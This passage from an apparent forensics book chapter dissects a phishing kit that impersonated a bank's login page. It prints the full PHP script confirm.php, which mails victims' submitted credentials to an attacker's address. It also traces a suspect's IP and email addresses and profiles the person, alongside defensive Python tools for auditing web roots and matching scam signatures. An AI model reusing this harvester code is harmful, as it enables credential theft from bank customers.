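    (images / "..." / "template.tar").write_bytes(b"")
    socal = Path(root, "socal")
    socal.mkdir()
    for i in (3, 4, 6, 7):
        (socal / f"party3_{i}.jpg").write_bytes(b"")
    (socal / "party3_5" / "template").mkdir(parents=True)
    (socal / "party3_5" / "template" / "logon.htm").write_text("")
    return root

def shape(name):
    """Collapse digit runs so party3_4.jpg and party3_5 share the shape 'party#_#'."""
    return re.sub(r"\d+", "#", Path(name).stem)

def audit_webroot(root):
    """Walk a web root and return sorted (relative path, reason) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        sibling_shapes = {shape(f) for f in filenames}
        for d in dirnames:
            rel = os.path.relpath(os.path.join(dirpath, d), root)
            if d.startswith("."):
                findings.append((rel, "dot-prefixed directory: hidden from plain ls and server listings"))
            # Mimicry only helps an intruder when there are many files to hide among.
            elif len(filenames) >= 4 and shape(d) in sibling_shapes:
                findings.append((rel, "directory name mimics the sibling file names"))
        for f in filenames:
            rel = os.path.relpath(os.path.join(dirpath, f), root)
            if f.endswith((".tar", ".tar.gz", ".tgz", ".zip")):
                findings.append((rel, "archive left on the server"))
            elif f.lower() in ("logon.htm", "login.htm") and rel.count(os.sep) >= 2:
                findings.append((rel, "login page buried deep in the tree"))
    return sorted(findings)

def audit_sample():
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_webroot(build_sample_tree(tmp))

if __name__ == "__main__":
    for path, reason in audit_sample():
        print(f"{path:45s} {reason}")
```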

6. The Phishing Kit

Saving the file template.tar from 64.157.x.x to a local directory and unpacking it produced the following set of files:

      659 Jan 13 13:47 confirm.php
    35713 Jan  2 06:08 SecurityMeasures.php
    27755 Nov 17 21:15 logon.htm
    36378 Nov  1 01:25 Common00.js
    13268 Nov  1 01:25 IEWin000.css
       43 Nov  1 01:25 1px_clea.gif
       61 Nov  1 01:25 1px_main.gif
       43 Nov  1 01:25 1px_whit.gif
      686 Nov  1 01:25 accountc.gif
       36 Nov  1 01:25 blueline.gif
      593 Nov  1 01:25 btn-crea.gif
      289 Nov  1 01:25 btn-logo.gif
      612 Nov  1 01:25 customer.gif
      675 Nov  1 01:25 loanscre.gif
      418 Nov  1 01:25 logo-equ.gif
      126 Nov  1 01:25 logon_yb.gif
      125 Nov  1 01:25 logon_yc.gif
      129 Nov  1 01:25 logon_yt.gif
      129 Nov  1 01:25 logon_yu.gif
      718 Nov  1 01:25 onlineba.gif
     1186 Nov  1 01:25 personal.gif
      509 Nov  1 01:25 secure_b.gif
     1706 Nov  1 01:25 wamucom_.gif
       36 Nov  1 01:25 whitelin.gif

Most of these represent image files that have been copied from the legitimate bank web site. The three important files for our purposes are logon.htm, SecurityMeasures.php, and confirm.php.

The first of these is a copy of the bank user login page, which asks for your account name and password. This leads you to SecurityMeasures.php, which asks you to enter your personal details into a form. That in turn is processed by confirm.php, which then redirects you to the real bank site. This is the typical way a phishing site is set up. To appear legitimate, it uses a page copied from the real site, with minor modifications. By leading you to the "real site," it may reassure some of its victims that it is not a scam. The overall structure is not that interesting but, because the source code for the PHP files was so kindly provided in the tar file, I was able to take the analysis to another level. But before describing those, there was a bonus waiting to be uncovered in the initial HTML page.


 

7. Page Tracking Information

Web pages for banks tend to be relatively sophisticated with complex formatting and corporate logos and images. That leads to voluminous and often unreadable HTML source for those pages. Pages for fake sites are invariably copied from the real site and then modified to suit the needs of the scam. In looking at these pages, the temptation is to search for a FORM tag, figure out the URL of the associated script, and ignore the rest of the page. But doing so can lead you to miss some gems of information.

Many of the large company sites track visitors to their sites using cookies. But because some users disable these, several other mechanisms have been developed. In one of these, the downloaded page includes an IMG tag that loads a tiny transparent image from a tracking server that is effectively invisible. However, this image is not retrieved directly from a file, rather it is passed from a server-side script. The name given to the image in the web page includes a set of parameters, which are stripped off and logged by the server.

The bank web page that Tidball copied to create the phishing site had one of these mechanisms buried within its source. Tidball apparently missed it. The image that is being fetched is called 4.gif; you can see the various parameters split onto separate lines:

    <img name="imgPageDot" border="0"
    src="https://metric.wamu.com/4.gif
    ?ng_host=login.personal.wamu.com
    &ng_uf=
    &ng_pagetitle=-
    &ng_referrer=https:
    //login.personal.wamu.com/enroll/EnrollmentInstructions.asp
    &ng_sr=-
    &ng_cookieOK=Y
    &ngm_st=CA
    &ng_pdver=102
    &ng_r1=2004-10-26T05:09:03-08:00
    &ng_r2=0.6315228" alt="" />

Inferring the function of parameters like these can be difficult if you have only a single example to work from. In a case such as this, try to download the same or similar pages from the real bank site, look for the tags, and then compare the parameters with the original example. That is what I did here, and it was immediately apparent that the ng_r1 parameter represents the date and time at which the page defined in the ng_referrer parameter was downloaded. The parameter ng_r2 seems to contain a unique identifier that could be used to cross reference this image download with a record in the logs of the tracking web server.

The server access logs for a busy site should contain the IP address of the computer that Tidball used to download the original web page from the bank site. Normally there would be no way to distinguish that specific access from the millions of others from legitimate visitors. But with this tracking mechanism, the bank can cross reference the date and time in those logs, using the unique identifier to resolve multiple accesses at the same time. In principle, they can look for this type of URL in the modified pages on phishing sites and quickly identify the IP address of the computer used to download the original page. If they are very lucky, that address might lead them directly to the scammer.

The date and time of downloads are informative in themselves. In this example, you can see that Tidball downloaded this page on Tuesday, 26 October 2004 at 05:09:03-08:00. The time zone of -08:00, eight hours behind Greenwich Mean Time, is what you would expect for a server on the West Coast of the United States, which is where this bank is located.

It is unlikely, though not impossible, that someone in this time zone downloaded the page at five in the morning. By looking at the time zones around the world, you can make an educated guess about where a person might be located, or more likely, where they are not. 5 a.m. West Coast time corresponds to 8 a.m. on the East Coast of the United States, which is still a little early. Moving further East translates the time to early afternoon in Europe and into evening in India and China, both of which are reasonable times for someone to be working on their site. That doesn't narrow things down very much, since those time zones contain more than 90% of the world's population! But it does argue that someone outside of the United States downloaded that original page.
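The analysis above, pulling the tracking parameters out of the copied page and then reasoning about the download time across time zones, is mechanical enough to script. The following is an added example, not code from the original study: it takes a constructed page fragment carrying the IMG tag shown above, extracts the parameters, parses ng_r1 with its offset, and reports in which regions the download fell within ordinary waking hours (the region list and the offsets are my own simplification).

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl, urlsplit

# Constructed page fragment: the IMG tag and parameter values are the ones shown
# above; the surrounding markup is invented so the parser has something to skip.
PAGE_HTML = """<html><body>
<form action="SecurityMeasures.php" method="post"> ... </form>
<img name="imgPageDot" border="0"
src="https://metric.wamu.com/4.gif?ng_host=login.personal.wamu.com&ng_uf=&ng_pagetitle=-
&ng_referrer=https://login.personal.wamu.com/enroll/EnrollmentInstructions.asp
&ng_sr=-&ng_cookieOK=Y&ngm_st=CA&ng_pdver=102
&ng_r1=2004-10-26T05:09:03-08:00&ng_r2=0.6315228" alt="" />
</body></html>"""

IMG_SRC = re.compile(r'<img\b[^>]*?\bsrc="([^"]+)"', re.I | re.S)

def find_tracking_pixels(html):
    """Return (host, params) for every IMG whose src carries a query string.
    Line breaks inside the attribute, as in the copied page, are stripped first."""
    found = []
    for m in IMG_SRC.finditer(html):
        src = re.sub(r"\s+", "", m.group(1))
        url = urlsplit(src)
        if url.query:
            found.append((url.netloc, dict(parse_qsl(url.query, keep_blank_values=True))))
    return found

def download_time(params):
    """ng_r1 is an ISO 8601 timestamp with a UTC offset; keep the offset."""
    return datetime.strptime(params["ng_r1"], "%Y-%m-%dT%H:%M:%S%z")

# Fixed offsets (hours from UTC) for the regions weighed in the text; daylight
# saving is ignored, which is fine for an argument this coarse.
ZONES = {"US West": -8, "US East": -5, "Western Europe": 1, "India": 5.5, "China": 8}

def local_times(when):
    """Wall-clock time of the download in each candidate region."""
    return {name: when.astimezone(timezone(timedelta(hours=off))) for name, off in ZONES.items()}

def plausible_regions(when, start=7, end=23):
    """Regions where the download fell inside ordinary waking hours [start, end)."""
    return [name for name, t in local_times(when).items() if start <= t.hour < end]

if __name__ == "__main__":
    for host, params in find_tracking_pixels(PAGE_HTML):
        when = download_time(params)
        print(f"{host} logged referrer {params['ng_referrer']} at {when:%A %d %B %Y %H:%M:%S %z}")
        print(f"cross-reference id ng_r2={params['ng_r2']}")
        for name, t in local_times(when).items():
            print(f"  {name:15s} {t:%a %H:%M}")
        print("plausible regions:", plausible_regions(when))
```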

8. The PHP Scripts

As I discuss in Chapter 5, you cannot normally download the source code of PHP scripts from a web site, since the server is configured to execute them. But because they were contained within the tar file, which could be downloaded, the source code of the scripts from this scam was accessible.

The script SecurityMeasures.php is basically a copy of a page from the real bank site that has been modified to pass its form data to a second script, confirm.php. This second script is the more interesting of the two and is shown in Example 11-1.

Example 11-1. confirm.php

<?php
$Block='24.15.208.175';
$TO = "tidball1972@aol.com";
$DEFAULT_EXIT_PAGE = "http://wamu.com/personal/welcome/privacy.htm";
$EX_PAGE = "http://www.disneyland.com";
$ip=$_SERVER["REMOTE_ADDR"];
$headers = "From: wamus@yahoo.com";
$subject="adik";
$message = "";

if ($_SERVER["REMOTE_ADDR"] == $Block) {
   Header("Location: ".$EX_PAGE);
   exit;
}
if ($_SERVER["REMOTE_ADDR"] != $Block) {
   while (list($key, $val) = each($HTTP_POST_VARS)) {
      $message .= "$key : $val\n";
   }
   $message .= "\nSent from ($ip)\n";
   mail($TO, $subject, $message, $headers);
   if(! $exit_page) $exit_page = $DEFAULT_EXIT_PAGE;
   Header("Location: ".$exit_page);
}
?>

This concise script reads in the parameters from the associated form and adds them to a string. This is sent out to the specified email address, and the script completes by returning a web page to the browser that contains only a Location HTTP header, which redirects the user to a specified web page. In this case, that page is a privacy notice on the real bank site.

As you have no doubt realized, this script is where the name Tidball comes from. The creator has set up the script to forward its collected data to an address at aol.com. Web-based email accounts are a favorite way for phishers to harvest their data. They are easy to set up without revealing your true identity and can be accessed from any machine. AOL accounts are especially easy to set up, thanks to the free trial access CDs that they liberally distribute.

On the one hand, the discovery of Tidball's email address is a real coup, but in reality, this will have been a short-lived account that was used only to receive data from this fake bank site. That is backed up by the fact that the only difference between the instances of confirm.php from the two examples is that address, as shown in this output from diff:

    3c3
    < $TO = "tidball1972@aol.com";
    ---
    > $TO = "tidball@runbox.com";

In the second example, the email is sent to an account on a web mail server in Norway. The use of the same name in both addresses is clearly interesting. It is hard to imagine the person behind these scams actually using his or her real name, but stranger things have happened. It could be that Tidball felt sufficiently secure, or was perhaps sufficiently naïve, not to choose another name, but that seems unlikely.

The script contains a second piece of revealing information. It defines a specific IP address in this line:

    $Block='24.15.208.175';

 

If the browser making the request has this address, then the script immediately redirects it to the web site for Disneyland without sending an email message. The same address is blocked in both examples of the script. There is clearly some special connection between this address and Tidball. The most appealing idea would be that this is the address of Tidball's own computer, and perhaps it has been blocked in order to make testing of the script more convenient. It is impossible to determine the real intent behind this, but it is certainly intriguing.

Pursuing this further, I used dig and whois to find out more about the address. dig showed the machine to be part of Comcast's network:

    % dig -x 24.15.208.175
    [...]
    ;; ANSWER SECTION:
    175.208.15.24.in-addr.arpa. 86400 IN    PTR
        c-24-15-208-175.hsd1.il.comcast.net.

Comcast is one of the large cable TV companies in the United States and provides many people with high-speed Internet access at home via cable modems. These have been the targets of attackers, because many of the attached computers do not have firewall software set up. It is possible that Tidball has hijacked this machine as a way to disguise him or herself. Another thing to bear in mind is that these machines are typically given dynamic IP addresses, so the one using this address today may not be the same as the one that used it when the scams were active.

The domain name of il.comcast.net suggests a location in Illinois, and running whois on the IP address confirms this:

    % whois 24.15.208.175
    [Querying whois.arin.net]
    [whois.arin.net]
    Comcast Cable Communications, IP Services EASTERNSHORE-1 (NET-24-0-0-0-1)
                                      24.0.0.0 - 24.15.255.255
    Comcast Cable Communications ILLINOIS-14 (NET-24-12-0-0-1)
                                      24.12.0.0 - 24.15.255.255

This section of the Comcast network, called EASTERNSHORE-1, probably represents Chicago and its surrounding towns. The only shoreline in Illinois is in this northeastern corner of the state. If this is the address of Tidball's machine, then its location in the middle of the United States does not fit with the time zone information, but it could just be that our friend is an early riser.

9. What Else Has Tidball Been Involved In?

A number of unusual clues, or signatures, presented themselves as I worked through these two parallel phishing examples. It is important to make a note of these as you encounter them because any one of them could help identify related scams. In this case, there were three main signatures:

 

The unusual phrasing of the email
    We recently have determined...

The unusual X-Mailer header line
    X-Mailer: The Bat! (v2.01)

The name of the redirection script
    realstat.php
These all occurred in the original emails, so it made sense to look for them in other messages in my mail folders. Basic searches using grep showed that The Bat! occurs in the X-Mailer headers of a lot of junk email, so that was not a useful signature. The other two search strings hit only the two original emails, indicating that these may be specific to this series of scams.

The next step was to use these strings in Google queries to see if anyone else had encountered the scams and might have additional information. The phrase taken from the email body produced a large number of hits. Even extending the query to "we recently have determined that different computers" produced more than 900 matches. Most of these were to pages that list phishing scams and spam. Phishing attacks on Washington Mutual accounted for some of these, but there were many more examples of fake emails from PayPal, eBay, and many other banks. These messages have very similar wording but appear to use different types of target URLs. This suggests that various people have adopted the same text of an original email message for their own phishing attempts. This could reflect a lack of creativity or just simple laziness on the part of the scammers. It may indicate that some of the people do not have English as their primary language, in which case it might be easier to use an existing block of text. So although this query string is specific for phishing scams, it does not resolve this particular variant.
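The grep searches described above amount to testing each candidate signature against a mail folder and discarding the ones that hit too much unrelated mail. The following added example, not part of the original study, does that over a constructed mbox (four made-up messages on reserved .example hosts; the real URLs are not reproduced): it counts how many messages each signature hits, which exposes The Bat! as a weak signature, and then lists the messages carrying the two signatures that remain specific.

```python
import re
import email
from email import policy

# Constructed mbox: two messages that fit the scam described above, one piece of
# unrelated junk also sent with The Bat!, and one legitimate message. Hosts use
# the reserved .example domain; the real URLs from the emails are not reproduced.
MBOX = """\
From scam1 Sat Jan 29 10:00:00 2005
From: "Washington Mutual" <support@wamu.example>
Subject: Security Alert
X-Mailer: The Bat! (v2.01)

We recently have determined that different computers have logged onto your
account. Confirm at http://a.example/realstat.php?http://b.example/template/logon.htm

From scam2 Mon Feb 14 09:00:00 2005
From: "Washington Mutual" <alerts@wamu.example>
Subject: Account Verification
X-Mailer: The Bat! (v2.01)

We recently have determined that different computers have logged onto your
account. Go to http://c.example/realstat.php?http://d.example/socal/party3_5/template/logon.htm

From junk Tue Feb 15 03:00:00 2005
From: deals@junk.example
Subject: Cheap software
X-Mailer: The Bat! (v2.01)

Best prices on software, visit http://junk.example/

From friend Wed Feb 16 12:00:00 2005
From: friend@home.example
Subject: Lunch?
X-Mailer: Mutt/1.4

We have determined that lunch is at noon.
"""

def parse_mbox(text):
    """Split mbox text at 'From ' separator lines into EmailMessage objects."""
    chunks = re.split(r"^From .*\n", text, flags=re.M)
    return [email.message_from_string(c, policy=policy.default) for c in chunks if c.strip()]

def body_text(msg):
    """Text of the (preferred plain-text) body, or '' if there is none."""
    part = msg.get_body(preferencelist=("plain", "html")) if msg.is_multipart() else msg
    return part.get_content() if part is not None else ""

# Signature name -> predicate. The Bat! is checked in the header; the phrase and
# the script name are searched in the body, as the grep searches in the text were.
SIGNATURES = {
    "phrase":   lambda m: "we recently have determined" in body_text(m).lower(),
    "x-mailer": lambda m: str(m.get("X-Mailer", "")).startswith("The Bat!"),
    "realstat": lambda m: "realstat.php" in body_text(m),
}

def match_signatures(msgs):
    """{subject: set of signatures that hit} for every message."""
    return {str(m["Subject"]): {n for n, f in SIGNATURES.items() if f(m)} for m in msgs}

def signature_counts(msgs):
    """Messages hit per signature; a high count means a weak signature."""
    hits = match_signatures(msgs)
    return {n: sum(n in s for s in hits.values()) for n in SIGNATURES}

def related_scams(msgs, required=("phrase", "realstat")):
    """Subjects of messages carrying every signature that proved specific."""
    return [subj for subj, s in match_signatures(msgs).items() if set(required) <= s]

if __name__ == "__main__":
    msgs = parse_mbox(MBOX)
    print("hits per signature:", signature_counts(msgs))
    print("related scams:", related_scams(msgs))
```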

After some experimentation, using realstat.php in the query and trying multiple search engines, I was able to find two other examples that match our original scams. The URLs contained in these two emails fit the template of the original examples exactly, using realstat.php to redirect to a second URL. Presumably this redirects the browser to a third site, as before:

Interestingly, the addresses of the two initial sites are both in the same network block. One of the redirect sites is in this block, and the other is the same as one of the original sites. That observation, combined with the specific format for the URLs, is a clear indication that Tidball was involved in these two scams.

It may be that these are the only phishing attempts that Tidball has made. Perhaps they were so successful that he or she is enjoying the good life on a beach somewhere. More likely, Tidball has moved on to another scam with a different modus operandi.

10. Timeline

The dates contained in the email messages, the web site directories, and the tar files can be combined to create a timeline for this series of scams. You can see how the fake web site was built and then installed on the two initial servers, followed by the sending of the associated spam.

 

Tuesday, 26 October 2004
A page from the original bank site was copied and converted into SecurityMeasures.php.

Sunday, 31 October 2004
A page from the original bank site was copied and converted into logon.htm.

Monday, 1 November 2004
The distribution file, template.tar, was created.

Sunday, 2 January 2005
Files were uploaded to the 64.157.x.x server.

Sunday, 9 January 2005
Files were uploaded to the 66.230.x.x server.

Thursday, 13 January 2005
An edit was made to confirm.php to insert the final email address in the 64.157.x.x instance.

Tuesday, 18 January 2005
An edit was made to confirm.php to insert the final email address in the 66.230.x.x instance.

Saturday, 29 January 2005
The email that led to the 64.157.x.x instance was sent.

Monday, 14 February 2005
The email that led to the 66.230.x.x instance was sent.

More than three months have elapsed between the original download of the bank pages and the deployment of the first email announcement. This is not the work of someone in a great hurry to get the scams up and running.
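Merging timestamps from several sources into one ordered timeline is routine enough to automate. The following added example, which is not part of the original study, builds a stand-in for template.tar whose member names and modification times follow the listing in section 6 (years taken from the timeline above), adds Date headers for the two emails (dates from the timeline, clock times invented), and merges them into an ordered timeline with the overall span in days.

```python
import io
import tarfile
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

def make_sample_tar():
    """Constructed stand-in for template.tar: member names and modification
    times follow the listing in section 6, with years taken from the timeline."""
    stamps = {
        "Common00.js":          datetime(2004, 11, 1, 1, 25, tzinfo=timezone.utc),
        "logon.htm":            datetime(2004, 11, 17, 21, 15, tzinfo=timezone.utc),
        "SecurityMeasures.php": datetime(2005, 1, 2, 6, 8, tzinfo=timezone.utc),
        "confirm.php":          datetime(2005, 1, 13, 13, 47, tzinfo=timezone.utc),
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, when in stamps.items():
            info = tarfile.TarInfo(name)
            info.mtime = int(when.timestamp())
            tar.addfile(info, io.BytesIO(b""))   # empty members; only mtime matters here
    return buf.getvalue()

# Date headers for the two emails: the dates are from the timeline, the clock
# times are invented.
EMAIL_DATES = {
    "email pointing at the 64.157.x.x instance": "Sat, 29 Jan 2005 11:02:00 +0000",
    "email pointing at the 66.230.x.x instance": "Mon, 14 Feb 2005 08:41:00 +0000",
}

def tar_events(tar_bytes, label):
    """One (UTC datetime, description) event per archive member."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return [(datetime.fromtimestamp(m.mtime, tz=timezone.utc), f"{label}: {m.name} last modified")
                for m in tar.getmembers()]

def email_events(date_headers):
    """One event per message, normalised to UTC whatever offset the header carries."""
    return [(parsedate_to_datetime(d).astimezone(timezone.utc), f"{label} sent")
            for label, d in date_headers.items()]

def build_timeline(tar_bytes, date_headers):
    """Merge all events and order them, earliest first."""
    return sorted(tar_events(tar_bytes, "template.tar") + email_events(date_headers))

def span_days(timeline):
    """Whole days between the first and the last event."""
    return (timeline[-1][0] - timeline[0][0]).days

if __name__ == "__main__":
    timeline = build_timeline(make_sample_tar(), EMAIL_DATES)
    for when, what in timeline:
        print(f"{when:%A, %d %B %Y %H:%M} UTC  {what}")
    print(f"{span_days(timeline)} days from first file change to last email")
```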

11. Who Is Tidball?

Every clue that this study has uncovered tells us something about Tidball. I can't come up with a name and address, but by combining facts with a bit of intuition, I can put together a fairly detailed profile. Here are the conclusions that I would put my money on:

 

Tidball is an individual
The extended timeline for these two scams argues against an organized group. Either Tidball is extremely busy with other things or this is a side project.

Tidball is smart, but careless
He or she has managed to break into and hijack the pornography sites. The exploit used is relatively well known but it will have taken some work to find sites that were vulnerable. He made two major mistakes in leaving the tar files behind on the hijacked sites and in not removing the bank tracking information at the bottom of the copied web pages. The combination of smart and careless suggests to me that Tidball is young, or at least not very experienced in the world of Internet scams.

Tidball might be from Chicago...or maybe not
Here's where I go out on a limb. The times at which the original bank pages were downloaded suggest a location outside the United States. However, the inclusion of a specific IP address in the PHP script that maps to the Chicago area is too striking a detail to ignore. This computer either belongs to Tidball or is under his or her control. The former is the simplest explanation, but that time difference troubles me, so I am betting that this is a compromised machine that Tidball has broken into at some stage.

Tidball is British or American
It is always dangerous to read too much into a name but the choice of Tidball is intriguing. Delving into various genealogy databases shows that it has its origins in the United Kingdom, most notably in the counties of Somerset and Devon. There are also many instances of the name in the United States, both currently and in historical records. If you did not already have a connection to the name then it seems an unlikely choice. Of course, if you wanted to pick a random alias then it is as good as any other. It seems to have no cultural connections, such as the name of a character from, say, Monty Python or Lord of the Rings. The simplest explanations are that the choice is random or that this is actually the name of the scammer. I have a hunch that it is the latter.

That is as far as this case study can go without involving ISPs or being able to look at the web server logs of the bank that was impersonated. Using relatively simple techniques, I have been able to uncover a remarkable amount of information about this scam and the person behind it. Perhaps more importantly, I had a lot of fun investigating this operation.